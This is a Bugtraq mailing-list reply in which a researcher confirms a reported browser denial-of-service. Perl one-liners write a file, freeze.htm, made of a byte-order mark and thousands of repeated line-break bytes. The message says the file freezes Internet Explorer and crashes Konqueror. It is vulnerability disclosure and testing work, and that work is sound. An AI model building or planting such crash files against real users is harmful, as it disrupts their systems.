ERRor wrote:
Hello, Bugtraq.
Malicious htm file can freeze IE with 100% CPU usage: Construct the file freeze.htm: c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
This string works only with Active Perl, in unix-like Perl versions exploit string is: perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence of bytes will be ...\x0D\x0D\x0A... Sorry, I have not noticed it at once.
I tested the freeze.htm generated with the revised Perl code in Konqeror 3.0.3 (shipped in KDE 3.0.3). When loading freeze.htm Konqeror core dumps with a bus error almost instantly. Every time. This was tested in FreeBSD 4.7-STABLE.
-- Med va"nlig ha"lsning, Yours
Joachim Stro"mbergson - Alltid i harmonisk sva"ngning. VP, Research & Development ---------------------------------------------------------------------- InformAsic AB / Hugo Grauers gata 5B / SE-411 33 GO"TEBORG / Sweden Tel: +46 31 68 54 90 Fax: +46 31 68 54 91 Mobile: +46 733 75 97 02 E-mail: joachim.strombergson@informasic.com Home: www.informasic.com ----------------------------------------------------------------------
